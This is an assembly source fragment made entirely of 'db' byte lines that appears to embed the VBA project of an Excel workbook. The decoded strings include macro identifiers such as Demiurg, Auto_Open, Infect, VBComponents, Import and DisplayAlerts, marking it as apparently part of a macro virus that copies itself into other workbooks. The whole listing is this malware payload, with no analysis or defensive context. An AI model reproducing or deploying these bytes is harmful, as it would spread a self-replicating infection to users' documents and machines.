db 073h, 079h, 08Ch, 073h, 022h, 085h, 07Bh, 0CBh
|
|||
|
db 028h, 053h, 061h, 076h, 040h, 067h, 001h, 0C6h
|
|||
|
db 076h, 0E6h, 021h, 000h, 0CCh, 061h, 05Eh, 000h
|
|||
|
db 000h, 001h, 000h, 0FFh, 007h, 00Ch, 000h, 000h
|
|||
|
db 009h, 004h, 000h, 000h, 0E4h, 004h, 001h, 0E6h
|
|||
|
db 009h, 000h, 001h, 000h, 005h, 000h, 002h, 000h
|
|||
|
db 01Ah, 001h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
|
|||
|
db 07Bh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 032h, 000h, 030h, 000h, 034h, 000h, 045h, 000h
|
|||
|
db 046h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 02Dh, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
|
|||
|
db 043h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 034h, 000h
|
|||
|
db 036h, 000h, 07Dh, 000h, 023h, 000h, 033h, 000h
|
|||
|
db 02Eh, 000h, 030h, 000h, 023h, 000h, 039h, 000h
|
|||
|
db 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch, 000h
|
|||
|
db 050h, 000h, 052h, 000h, 04Fh, 000h, 047h, 000h
|
|||
|
db 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh, 000h
|
|||
|
db 045h, 000h, 05Ch, 000h, 047h, 000h, 045h, 000h
|
|||
|
db 04Dh, 000h, 045h, 000h, 049h, 000h, 04Eh, 000h
|
|||
|
db 053h, 000h, 041h, 000h, 04Dh, 000h, 045h, 000h
|
|||
|
db 020h, 000h, 044h, 000h, 041h, 000h, 054h, 000h
|
|||
|
db 045h, 000h, 049h, 000h, 045h, 000h, 04Eh, 000h
|
|||
|
db 05Ch, 000h, 04Dh, 000h, 049h, 000h, 043h, 000h
|
|||
|
db 052h, 000h, 04Fh, 000h, 053h, 000h, 04Fh, 000h
|
|||
|
db 046h, 000h, 054h, 000h, 020h, 000h, 053h, 000h
|
|||
|
db 048h, 000h, 041h, 000h, 052h, 000h, 045h, 000h
|
|||
|
db 044h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
|
|||
|
db 041h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
|
|||
|
db 041h, 000h, 033h, 000h, 033h, 000h, 032h, 000h
|
|||
|
db 02Eh, 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h
|
|||
|
db 023h, 000h, 056h, 000h, 069h, 000h, 073h, 000h
|
|||
|
db 075h, 000h, 061h, 000h, 06Ch, 000h, 020h, 000h
|
|||
|
db 042h, 000h, 061h, 000h, 073h, 000h, 069h, 000h
|
|||
|
db 063h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
|
|||
|
db 072h, 000h, 020h, 000h, 041h, 000h, 070h, 000h
|
|||
|
db 070h, 000h, 06Ch, 000h, 069h, 000h, 063h, 000h
|
|||
|
db 061h, 000h, 074h, 000h, 069h, 000h, 06Fh, 000h
|
|||
|
db 06Eh, 000h, 073h, 0E6h, 00Dh, 000h, 004h, 001h
|
|||
|
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
|
|||
|
db 030h, 000h, 038h, 000h, 031h, 000h, 033h, 000h
|
|||
|
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
|
|||
|
db 07Dh, 000h, 023h, 000h, 031h, 000h, 02Eh, 000h
|
|||
|
db 032h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
|
|||
|
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 050h, 000h
|
|||
|
db 072h, 000h, 06Fh, 000h, 067h, 000h, 072h, 000h
|
|||
|
db 061h, 000h, 06Dh, 000h, 06Dh, 000h, 065h, 000h
|
|||
|
db 05Ch, 000h, 04Dh, 000h, 069h, 000h, 063h, 000h
|
|||
|
db 072h, 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h
|
|||
|
db 066h, 000h, 074h, 000h, 020h, 000h, 04Fh, 000h
|
|||
|
db 066h, 000h, 066h, 000h, 069h, 000h, 063h, 000h
|
|||
|
db 065h, 000h, 05Ch, 000h, 04Fh, 000h, 066h, 000h
|
|||
|
db 066h, 000h, 069h, 000h, 063h, 000h, 065h, 000h
|
|||
|
db 05Ch, 000h, 045h, 000h, 058h, 000h, 043h, 000h
|
|||
|
db 045h, 000h, 04Ch, 000h, 038h, 000h, 02Eh, 000h
|
|||
|
db 04Fh, 000h, 04Ch, 000h, 042h, 000h, 023h, 000h
|
|||
|
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
|
|||
|
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
|
|||
|
db 074h, 000h, 020h, 000h, 045h, 000h, 078h, 000h
|
|||
|
db 063h, 000h, 065h, 000h, 06Ch, 000h, 020h, 000h
|
|||
|
db 038h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
|
|||
|
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
|
|||
|
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
|
|||
|
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
|
|||
|
db 072h, 000h, 079h, 0E6h, 00Dh, 000h, 0B8h, 000h
|
|||
|
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
|
|||
|
db 030h, 000h, 034h, 000h, 033h, 000h, 030h, 000h
|
|||
|
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
|
|||
|
db 07Dh, 000h, 023h, 000h, 032h, 000h, 02Eh, 000h
|
|||
|
db 030h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
|
|||
|
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 057h, 000h
|
|||
|
db 049h, 000h, 04Eh, 000h, 044h, 000h, 04Fh, 000h
|
|||
|
db 057h, 000h, 053h, 000h, 05Ch, 000h, 053h, 000h
|
|||
|
db 059h, 000h, 053h, 000h, 054h, 000h, 045h, 000h
|
|||
|
db 04Dh, 000h, 05Ch, 000h, 053h, 000h, 054h, 000h
|
|||
|
db 044h, 000h, 04Fh, 000h, 04Ch, 000h, 045h, 000h
|
|||
|
db 032h, 000h, 02Eh, 000h, 054h, 000h, 04Ch, 000h
|
|||
|
db 042h, 000h, 023h, 000h, 04Fh, 000h, 04Ch, 000h
|
|||
|
db 045h, 000h, 020h, 000h, 041h, 000h, 075h, 000h
|
|||
|
db 074h, 000h, 06Fh, 000h, 06Dh, 000h, 061h, 000h
|
|||
|
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
|
|||
|
db 00Dh, 000h, 0E0h, 000h, 02Ah, 000h, 05Ch, 000h
|
|||
|
db 047h, 000h, 07Bh, 000h, 036h, 000h, 032h, 000h
|
|||
|
db 041h, 000h, 033h, 000h, 032h, 000h, 043h, 000h
|
|||
|
db 036h, 000h, 032h, 000h, 02Dh, 000h, 041h, 000h
|
|||
|
db 033h, 000h, 036h, 000h, 044h, 000h, 02Dh, 000h
|
|||
|
db 031h, 000h, 031h, 000h, 044h, 000h, 033h, 000h
|
|||
|
db 02Dh, 000h, 041h, 000h, 035h, 000h, 030h, 000h
|
|||
|
db 030h, 000h, 02Dh, 000h, 041h, 000h, 036h, 000h
|
|||
|
db 046h, 000h, 033h, 000h, 044h, 000h, 044h, 000h
|
|||
|
db 041h, 000h, 044h, 000h, 038h, 000h, 032h, 000h
|
|||
|
db 033h, 000h, 039h, 000h, 07Dh, 000h, 023h, 000h
|
|||
|
db 032h, 000h, 02Eh, 000h, 030h, 000h, 023h, 000h
|
|||
|
db 030h, 000h, 023h, 000h, 043h, 000h, 03Ah, 000h
|
|||
|
db 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh, 000h
|
|||
|
db 044h, 000h, 04Fh, 000h, 057h, 000h, 053h, 000h
|
|||
|
db 05Ch, 000h, 053h, 000h, 059h, 000h, 053h, 000h
|
|||
|
db 054h, 000h, 045h, 000h, 04Dh, 000h, 05Ch, 000h
|
|||
|
db 04Dh, 000h, 053h, 000h, 046h, 000h, 06Fh, 000h
|
|||
|
db 072h, 000h, 06Dh, 000h, 073h, 000h, 02Eh, 000h
|
|||
|
db 054h, 000h, 057h, 000h, 044h, 000h, 023h, 000h
|
|||
|
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
|
|||
|
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
|
|||
|
db 074h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
|
|||
|
db 072h, 000h, 06Dh, 000h, 073h, 000h, 020h, 000h
|
|||
|
db 032h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
|
|||
|
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
|
|||
|
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
|
|||
|
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
|
|||
|
db 072h, 000h, 079h, 0E6h, 00Bh, 000h, 001h, 000h
|
|||
|
db 0E4h, 000h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
|
|||
|
db 07Bh, 000h, 036h, 000h, 032h, 000h, 041h, 000h
|
|||
|
db 033h, 000h, 032h, 000h, 043h, 000h, 036h, 000h
|
|||
|
db 033h, 000h, 02Dh, 000h, 041h, 000h, 033h, 000h
|
|||
|
db 036h, 000h, 044h, 000h, 02Dh, 000h, 031h, 000h
|
|||
|
db 031h, 000h, 044h, 000h, 033h, 000h, 02Dh, 000h
|
|||
|
db 081h, 000h, 000h, 000h, 082h, 000h, 000h, 000h
|
|||
|
db 083h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
|
|||
|
db 085h, 000h, 000h, 000h, 086h, 000h, 000h, 000h
|
|||
|
db 087h, 000h, 000h, 000h, 088h, 000h, 000h, 000h
|
|||
|
db 089h, 000h, 000h, 000h, 08Ah, 000h, 000h, 000h
|
|||
|
db 08Bh, 000h, 000h, 000h, 08Ch, 000h, 000h, 000h
|
|||
|
db 08Dh, 000h, 000h, 000h, 08Eh, 000h, 000h, 000h
|
|||
|
db 08Fh, 000h, 000h, 000h, 090h, 000h, 000h, 000h
|
|||
|
db 091h, 000h, 000h, 000h, 092h, 000h, 000h, 000h
|
|||
|
db 093h, 000h, 000h, 000h, 094h, 000h, 000h, 000h
|
|||
|
db 095h, 000h, 000h, 000h, 096h, 000h, 000h, 000h
|
|||
|
db 097h, 000h, 000h, 000h, 098h, 000h, 000h, 000h
|
|||
|
db 0FEh, 0FFh, 0FFh, 0FFh, 09Ah, 000h, 000h, 000h
|
|||
|
db 09Bh, 000h, 000h, 000h, 09Ch, 000h, 000h, 000h
|
|||
|
db 09Dh, 000h, 000h, 000h, 09Eh, 000h, 000h, 000h
|
|||
|
db 09Fh, 000h, 000h, 000h, 0A0h, 000h, 000h, 000h
|
|||
|
db 0A1h, 000h, 000h, 000h, 0A2h, 000h, 000h, 000h
|
|||
|
db 0A3h, 000h, 000h, 000h, 0A4h, 000h, 000h, 000h
|
|||
|
db 0FEh, 0FFh, 0FFh, 0FFh, 0A6h, 000h, 000h, 000h
|
|||
|
db 0FEh, 0FFh, 0FFh, 0FFh, 0A8h, 000h, 000h, 000h
|
|||
|
db 0A9h, 000h, 000h, 000h, 0AAh, 000h, 000h, 000h
|
|||
|
db 0ABh, 000h, 000h, 000h, 0ACh, 000h, 000h, 000h
|
|||
|
db 0ADh, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
|
|||
|
db 0AFh, 000h, 000h, 000h, 0B0h, 000h, 000h, 000h
|
|||
|
db 0FEh, 0FFh, 0FFh, 0FFh, 0B2h, 000h, 000h, 000h
|
|||
|
db 0B3h, 000h, 000h, 000h, 0B4h, 000h, 000h, 000h
|
|||
|
db 0B5h, 000h, 000h, 000h, 0B6h, 000h, 000h, 000h
|
|||
|
db 0B7h, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
|
|||
|
db 0B9h, 000h, 000h, 000h, 0FEh, 0E6h, 0FFh, 0FFh
|
|||
|
db 0E6h, 01Ch, 0FFh, 041h, 000h, 035h, 000h, 030h
|
|||
|
db 000h, 030h, 000h, 02Dh, 000h, 041h, 000h, 036h
|
|||
|
db 000h, 046h, 000h, 033h, 000h, 044h, 000h, 044h
|
|||
|
db 000h, 041h, 000h, 044h, 000h, 038h, 000h, 032h
|
|||
|
db 000h, 033h, 000h, 039h, 000h, 07Dh, 000h, 023h
|
|||
|
db 000h, 032h, 000h, 02Eh, 000h, 030h, 000h, 023h
|
|||
|
db 000h, 030h, 000h, 023h, 000h, 043h, 000h, 03Ah
|
|||
|
db 000h, 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh
|
|||
|
db 000h, 044h, 000h, 04Fh, 000h, 057h, 000h, 053h
|
|||
|
db 000h, 05Ch, 000h, 054h, 000h, 045h, 000h, 04Dh
|
|||
|
db 000h, 050h, 000h, 05Ch, 000h, 056h, 000h, 042h
|
|||
|
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
|
|||
|
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
|
|||
|
db 000h, 073h, 000h, 02Eh, 000h, 045h, 000h, 058h
|
|||
|
db 000h, 044h, 000h, 023h, 000h, 04Dh, 000h, 069h
|
|||
|
db 000h, 063h, 000h, 072h, 000h, 06Fh, 000h, 073h
|
|||
|
db 000h, 06Fh, 000h, 066h, 000h, 074h, 000h, 020h
|
|||
|
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
|
|||
|
db 000h, 073h, 000h, 020h, 000h, 032h, 000h, 02Eh
|
|||
|
db 000h, 030h, 000h, 020h, 000h, 04Fh, 000h, 062h
|
|||
|
db 000h, 06Ah, 000h, 065h, 000h, 063h, 000h, 074h
|
|||
|
db 000h, 020h, 000h, 04Ch, 000h, 069h, 000h, 062h
|
|||
|
db 000h, 072h, 000h, 061h, 000h, 072h, 000h, 079h
|
|||
|
db 0E6h, 00Bh, 000h, 001h, 000h, 000h, 000h, 0E1h
|
|||
|
db 02Eh, 045h, 00Dh, 08Fh, 0E0h, 01Ah, 010h, 085h
|
|||
|
db 02Eh, 002h, 060h, 08Ch, 04Dh, 00Bh, 0B4h, 000h
|
|||
|
db 000h, 004h, 001h, 02Ah, 000h, 05Ch, 000h, 047h
|
|||
|
db 000h, 07Bh, 000h, 032h, 000h, 044h, 000h, 046h
|
|||
|
db 000h, 038h, 000h, 044h, 000h, 030h, 000h, 034h
|
|||
|
db 000h, 043h, 000h, 02Dh, 000h, 035h, 000h, 042h
|
|||
|
db 000h, 046h, 000h, 041h, 000h, 02Dh, 000h, 031h
|
|||
|
db 000h, 030h, 000h, 031h, 000h, 042h, 000h, 02Dh
|
|||
|
db 000h, 042h, 000h, 044h, 000h, 045h, 000h, 035h
|
|||
|
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 041h
|
|||
|
db 000h, 041h, 000h, 030h, 000h, 030h, 000h, 034h
|
|||
|
db 000h, 034h, 000h, 044h, 000h, 045h, 000h, 035h
|
|||
|
db 000h, 032h, 000h, 07Dh, 000h, 023h, 000h, 032h
|
|||
|
db 000h, 02Eh, 000h, 030h, 000h, 023h, 000h, 030h
|
|||
|
db 000h, 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch
|
|||
|
db 000h, 050h, 000h, 052h, 000h, 04Fh, 000h, 047h
|
|||
|
db 000h, 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh
|
|||
|
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 049h
|
|||
|
db 000h, 043h, 000h, 052h, 000h, 04Fh, 000h, 053h
|
|||
|
db 000h, 04Fh, 000h, 046h, 000h, 054h, 000h, 020h
|
|||
|
db 000h, 04Fh, 000h, 046h, 000h, 046h, 000h, 049h
|
|||
|
db 000h, 043h, 000h, 045h, 000h, 05Ch, 000h, 04Fh
|
|||
|
db 000h, 046h, 000h, 046h, 000h, 049h, 000h, 043h
|
|||
|
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
|
|||
|
db 000h, 04Fh, 000h, 039h, 000h, 037h, 000h, 02Eh
|
|||
|
db 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h, 023h
|
|||
|
db 000h, 04Dh, 000h, 069h, 000h, 063h, 000h, 072h
|
|||
|
db 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h
|
|||
|
db 000h, 074h, 000h, 020h, 000h, 04Fh, 000h, 066h
|
|||
|
db 000h, 066h, 000h, 069h, 000h, 063h, 000h, 065h
|
|||
|
db 000h, 020h, 000h, 038h, 000h, 02Eh, 000h, 030h
|
|||
|
db 000h, 020h, 000h, 04Fh, 000h, 062h, 000h, 06Ah
|
|||
|
db 000h, 065h, 000h, 063h, 000h, 074h, 000h, 020h
|
|||
|
db 000h, 04Ch, 000h, 069h, 000h, 062h, 000h, 072h
|
|||
|
db 000h, 061h, 000h, 072h, 000h, 079h, 0E6h, 00Dh
|
|||
|
db 000h, 003h, 000h, 002h, 000h, 002h, 000h, 001h
|
|||
|
db 000h, 003h, 000h, 004h, 002h, 000h, 000h, 006h
|
|||
|
db 002h, 001h, 000h, 008h, 002h, 000h, 000h, 010h
|
|||
|
db 002h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh
|
|||
|
db 0FFh, 000h, 000h, 0E8h, 005h, 0C0h, 038h, 003h
|
|||
|
db 000h, 0E6h, 00Ah, 0FFh, 000h, 000h, 001h, 000h
|
|||
|
db 0E6h, 026h, 0FFh, 002h, 000h, 0E6h, 00Ah, 0FFh
|
|||
|
db 001h, 0E6h, 013h, 000h, 0B5h, 031h, 003h, 000h
|
|||
|
db 022h, 000h, 044h, 000h, 069h, 000h, 065h, 000h
|
|||
|
db 073h, 000h, 065h, 000h, 041h, 000h, 072h, 000h
|
|||
|
db 062h, 000h, 065h, 000h, 069h, 000h, 074h, 000h
|
|||
|
db 073h, 000h, 06Dh, 000h, 061h, 000h, 070h, 000h
|
|||
|
db 070h, 000h, 065h, 000h, 00Ah, 000h, 034h, 033h
|
|||
|
db 038h, 063h, 030h, 030h, 035h, 065h, 038h, 000h
|
|||
|
db 003h, 000h, 02Ah, 044h, 001h, 015h, 002h, 0FFh
|
|||
|
db 0FFh, 0B7h, 031h, 0E6h, 007h, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh
|
|||
|
db 010h, 000h, 054h, 000h, 061h, 000h, 062h, 000h
|
|||
|
db 065h, 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h
|
|||
|
db 031h, 000h, 00Ah, 000h, 035h, 033h, 038h, 063h
|
|||
|
db 030h, 030h, 035h, 065h, 038h, 000h, 003h, 000h
|
|||
|
db 02Ah, 044h, 001h, 019h, 002h, 0FFh, 0FFh, 0B9h
|
|||
|
db 031h, 0E6h, 006h, 000h, 018h, 002h, 000h, 000h
|
|||
|
db 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh, 00Eh
|
|||
|
db 000h, 044h, 000h, 065h, 000h, 06Dh, 000h, 069h
|
|||
|
db 000h, 075h, 000h, 072h, 000h, 067h, 000h, 00Ah
|
|||
|
db 000h, 064h, 033h, 038h, 063h, 030h, 030h, 035h
|
|||
|
db 066h, 036h, 000h, 003h, 000h, 02Ah, 044h, 001h
|
|||
|
db 01Ch, 002h, 0FFh, 0FFh, 0BBh, 031h, 0E6h, 006h
|
|||
|
db 000h, 030h, 002h, 000h, 000h, 000h, 0B7h, 005h
|
|||
|
db 000h, 000h, 0E6h, 006h, 0FFh, 001h, 001h, 050h
|
|||
|
db 002h, 000h, 000h, 0E6h, 0D8h, 0FFh, 000h, 002h
|
|||
|
db 000h, 000h, 0E6h, 004h, 0FFh, 018h, 002h, 000h
|
|||
|
db 000h, 0E6h, 004h, 0FFh, 030h, 002h, 000h, 000h
|
|||
|
db 0E6h, 0FFh, 0FFh, 0E6h, 015h, 0FFh, 0E7h, 06Eh
|
|||
|
db 0E4h, 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h
|
|||
|
db 0A6h, 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h
|
|||
|
db 0FFh, 001h, 000h, 000h, 000h, 0E9h, 06Eh, 0E4h
|
|||
|
db 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h
|
|||
|
db 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh
|
|||
|
db 001h, 000h, 000h, 000h, 0EBh, 06Eh, 0E4h, 0D9h
|
|||
|
db 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h, 0F3h
|
|||
|
db 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh, 001h
|
|||
|
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 030h, 000h
|
|||
|
db 000h, 000h, 080h, 0E6h, 005h, 000h, 020h, 001h
|
|||
|
db 021h, 000h, 0FFh, 000h, 0B8h, 028h, 000h, 000h
|
|||
|
db 005h, 004h, 045h, 078h, 063h, 065h, 06Ch, 080h
|
|||
|
db 02Bh, 010h, 000h, 003h, 004h, 056h, 042h, 041h
|
|||
|
db 0F7h, 0E2h, 010h, 000h, 005h, 004h, 057h, 069h
|
|||
|
db 06Eh, 031h, 036h, 0C1h, 07Eh, 010h, 000h, 005h
|
|||
|
db 004h, 057h, 069h, 06Eh, 033h, 032h, 007h, 07Fh
|
|||
|
db 010h, 000h, 003h, 004h, 04Dh, 061h, 063h, 0B3h
|
|||
|
db 0B2h, 010h, 000h, 008h, 004h, 050h, 072h, 06Fh
|
|||
|
db 06Ah, 065h, 06Bh, 074h, 031h, 0D2h, 041h, 010h
|
|||
|
db 000h, 006h, 004h, 073h, 074h, 064h, 06Fh, 06Ch
|
|||
|
db 065h, 093h, 060h, 010h, 000h, 007h, 000h, 04Dh
|
|||
|
db 053h, 046h, 06Fh, 072h, 06Dh, 073h, 043h, 00Fh
|
|||
|
db 010h, 000h, 00Ah, 004h, 056h, 042h, 041h, 050h
|
|||
|
db 072h, 06Fh, 06Ah, 065h, 063h, 074h, 0BEh, 0BFh
|
|||
|
db 010h, 000h, 006h, 004h, 04Fh, 066h, 066h, 069h
|
|||
|
db 063h, 065h, 015h, 075h, 010h, 000h, 011h, 004h
|
|||
|
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
|
|||
|
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
|
|||
|
db 065h, 0AFh, 081h, 010h, 000h, 009h, 080h, 000h
|
|||
|
db 000h, 0FFh, 003h, 001h, 000h, 05Fh, 045h, 076h
|
|||
|
db 061h, 06Ch, 075h, 061h, 074h, 065h, 018h, 0D9h
|
|||
|
db 010h, 000h, 008h, 004h, 054h, 061h, 062h, 065h
|
|||
|
db 06Ch, 06Ch, 065h, 031h, 052h, 08Ah, 010h, 000h
|
|||
|
db 006h, 004h, 04Dh, 06Fh, 064h, 075h, 06Ch, 031h
|
|||
|
db 0CDh, 01Eh, 010h, 000h, 007h, 004h, 044h, 065h
|
|||
|
db 06Dh, 069h, 075h, 072h, 067h, 01Dh, 017h, 010h
|
|||
|
db 000h, 009h, 004h, 041h, 075h, 074h, 06Fh, 05Fh
|
|||
|
db 04Fh, 070h, 065h, 06Eh, 056h, 020h, 010h, 000h
|
|||
|
db 00Bh, 000h, 041h, 070h, 070h, 06Ch, 069h, 063h
|
|||
|
db 061h, 074h, 069h, 06Fh, 06Eh, 0A5h, 02Ah, 010h
|
|||
|
db 000h, 00Fh, 000h, 04Fh, 06Eh, 053h, 068h, 065h
|
|||
|
db 065h, 074h, 041h, 063h, 074h, 069h, 076h, 061h
|
|||
|
db 074h, 065h, 0FAh, 06Eh, 010h, 000h, 00Ah, 004h
|
|||
|
db 041h, 075h, 074h, 06Fh, 05Fh, 043h, 06Ch, 06Fh
|
|||
|
db 073h, 065h, 077h, 080h, 010h, 000h, 00Ch, 000h
|
|||
|
db 041h, 063h, 074h, 069h, 076h, 065h, 057h, 069h
|
|||
|
db 06Eh, 064h, 06Fh, 077h, 0C3h, 02Bh, 010h, 000h
|
|||
|
db 007h, 000h, 056h, 069h, 073h, 069h, 062h, 06Ch
|
|||
|
db 065h, 0B6h, 0D3h, 010h, 000h, 006h, 004h, 049h
|
|||
|
db 06Eh, 066h, 065h, 063h, 074h, 0E8h, 066h, 010h
|
|||
|
db 000h, 00Dh, 000h, 044h, 069h, 073h, 070h, 06Ch
|
|||
|
db 061h, 079h, 041h, 06Ch, 065h, 072h, 074h, 073h
|
|||
|
db 0F4h, 0F6h, 010h, 000h, 008h, 000h, 06Ch, 061h
|
|||
|
db 073h, 074h, 063h, 068h, 061h, 072h, 013h, 09Ah
|
|||
|
db 010h, 000h, 003h, 000h, 041h, 073h, 063h, 021h
|
|||
|
db 075h, 010h, 000h, 00Eh, 000h, 041h, 063h, 074h
|
|||
|
db 069h, 076h, 065h, 057h, 06Fh, 072h, 06Bh, 062h
|
|||
|
db 06Fh, 06Fh, 06Bh, 013h, 0A2h, 010h, 000h, 001h
|
|||
|
db 000h, 069h, 060h, 010h, 010h, 000h, 009h, 000h
|
|||
|
db 056h, 042h, 050h, 072h, 06Fh, 06Ah, 065h, 063h
|
|||
|
db 074h, 04Fh, 068h, 010h, 000h, 00Ch, 000h, 056h
|
|||
|
db 042h, 043h, 06Fh, 06Dh, 070h, 06Fh, 06Eh, 065h
|
|||
|
db 06Eh, 074h, 073h, 00Ah, 027h, 010h, 000h, 005h
|
|||
|
db 000h, 063h, 06Fh, 075h, 06Eh, 074h, 030h, 076h
|
|||
|
db 010h, 000h, 006h, 000h, 049h, 06Dh, 070h, 06Fh
|
|||
|
db 072h, 074h, 069h, 0C5h, 010h, 000h, 004h, 000h
|
|||
|
db 053h, 061h, 076h, 065h, 092h, 0D0h, 010h, 000h
|
|||
|
db 008h, 004h, 057h, 06Fh, 072h, 06Bh, 062h, 06Fh
|
|||
|
db 06Fh, 06Bh, 06Bh, 018h, 010h, 000h, 002h, 0FFh
|
|||
|
db 0FFh, 001h, 001h, 06Ch, 000h, 000h, 000h, 01Dh
|
|||
|
db 002h, 002h, 000h, 010h, 000h, 0E6h, 012h, 0FFh
|
|||
|
db 000h, 002h, 001h, 000h, 0FFh, 0FFh, 002h, 002h
|
|||
|
db 000h, 000h, 0E6h, 01Ah, 0FFh, 00Ch, 002h, 002h
|
|||
|
db 000h, 0FFh, 0FFh, 00Eh, 002h, 003h, 000h, 0FFh
|
|||
|
db 0FFh, 010h, 002h, 0E6h, 004h, 0FFh, 012h, 002h
|
|||
|
db 004h, 000h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
|
|||
|
db 00Eh, 000h, 0E6h, 006h, 0FFh, 019h, 002h, 001h
|
|||
|
db 000h, 00Eh, 000h, 0E6h, 006h, 0FFh, 000h, 000h
|
|||
|
db 012h, 000h, 000h, 000h, 001h, 000h, 036h, 0E6h
|
|||
|
db 060h, 000h, 001h, 0C6h, 0B2h, 080h, 001h, 000h
|
|||
|
db 004h, 000h, 000h, 000h, 001h, 000h, 030h, 02Ah
|
|||
|
db 002h, 002h, 090h, 009h, 000h, 070h, 014h, 006h
|
|||
|
db 048h, 003h, 000h, 082h, 002h, 000h, 064h, 0E4h
|
|||
|
db 004h, 004h, 000h, 00Ah, 000h, 01Ch, 000h, 056h
|
|||
|
db 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h, 088h
|
|||
|
db 063h, 074h, 005h, 000h, 034h, 000h, 000h, 040h
|
|||
|
db 002h, 014h, 06Ah, 006h, 002h, 00Ah, 03Dh, 002h
|
|||
|
db 00Ah, 007h, 002h, 072h, 001h, 014h, 008h, 005h
|
|||
|
db 006h, 012h, 009h, 002h, 012h, 0E8h, 005h, 0C0h
|
|||
|
db 038h, 003h, 094h, 000h, 00Ch, 002h, 04Ah, 03Ch
|
|||
|
db 002h, 00Ah, 016h, 000h, 001h, 072h, 080h, 073h
|
|||
|
